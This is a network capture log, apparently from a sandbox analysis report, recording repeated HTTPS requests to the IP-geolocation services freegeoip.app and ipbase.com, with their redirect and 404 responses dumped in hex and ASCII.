                                      2024-09-06 23:47:31 UTC635INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:31 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nqtAEGt2MAJHzbrm06CHVvTCnJ5RtJ7th6aZe3uThvoE7FyXeUXXcyr248XH9JsgMzLwEnRmu9X%2FTNmThaPmwYUvBw3WaEkIyIlUs5fJe1F5BeF6HcTafjhpwNth0LHP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2583bfa7843ed-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:31 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192.168.2.549723104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:32 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:32 UTC736INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:32 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7656
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRS044ASAV2D4YKFE3GMX
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=83gyU9C9RjNCsGoT%2BwzJkgFws1PoPzAuBPGQw5tzy%2Bq7FTLWZbXGeZzBEY1JkKKbSo8wUxaH%2BQ4Y2LADqhtJ%2BiETdCpwqiXFl3W1wCvLKYUJA8Mz018dRNuEmkNc"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2583fec8443cd-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:32 UTC633INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:32 UTC1369INData Raw: 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20
                                      Data Ascii: g: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:32 UTC1087INData Raw: 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329
                                      2024-09-06 23:47:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192.168.2.549724188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:37 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:37 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:37 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CgQuezb4hBcindgaJeD2djeJ03gFVcjTDHAGb1WbCYxnN4jijdU8R7E8lT%2BtDWE0YpApCmWq%2BICO4J8LpwelwWyJyeWGAp2PwwJR2H3P%2FQFBGrdQmmv007quJ1tiDm8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258606abec32c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:37 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192.168.2.549725104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:38 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:38 UTC737INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 27365
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRZ2WT2RPQRVMFHJTMQQ6
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLXYp%2BX4ehOAKvEKmx%2F%2F0uCXvVbooFbHg2xMXHphX1q%2F0LZoKviJ4zHwbOG3E727TJEjz9PamVNRyGFbmIN0B73dakgtcBKjZ1HeM1tnE9eirCFA91928EqqcbLf"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25866d9ec7d1e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:38 UTC632INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:38 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a
                                      Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:38 UTC1088INData Raw: 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:47:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192.168.2.549726188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:40 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:40 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:40 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:40 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xXS8i1PND5XTwB%2Bn%2FshzI1jOdWSefqBlKVyXgLVDrxc9FJptpOUrNiyicnKVfSP8JBn%2BOGuGhl0Lr5MS%2BQHYxWL9dqW7NrnakV3mCw0icj36ZDntBodOO7V3LUEi0kP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258740e2cc425-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:40 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192.168.2.549727104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:41 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:41 UTC735INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:41 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33316
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VS1RY8HR6ANAJX6PW7VKP
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzEtaSrIDsbh0oXNd4VoJFMlGK2mJzpKW33Ez1EWk9WO7yPMqgLjPmxY6bOXZrJpq%2BuKGosIO5eJgx0LPJImcJCPpSJ%2BTY3567%2B2Q2qLH7VNhZ6XKj50EEPiN7uZ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258780f5d43fd-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:41 UTC634INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:41 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
                                      Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:47:41 UTC1086INData Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:47:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192.168.2.549729188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:45 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:45 UTC643INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:45 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKTwFk5U2ygH0CiXZkVpnwOIFyU%2BjW3BxKfx3%2FNU7%2FyKdex47qUvMQGNNP2lBUphq8w2zKJls2IkM%2FqEK%2FWnz30e4GDQQdPtKw7WcPzT6bP9LPzr6Hv1WiqsLg9iBx9Z"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2589309594333-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:45 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15192.168.2.549730104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:46 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:46 UTC732INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 24
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VS6K8GVVQKTRT2SHN0H3W
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWzdHqkVWWmftKRCDeKCYrRN9%2BejA4SbAC2HUQ1wf4FcmdP%2BGtXvh1NLFVzbo%2FhxIeYxp87dUOxFnnQyq0OxoQ5V1QhsWYk6hPJPIk7lo5GxHF1lVml8GPTlnDK"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25896e9e515d7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:46 UTC637INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
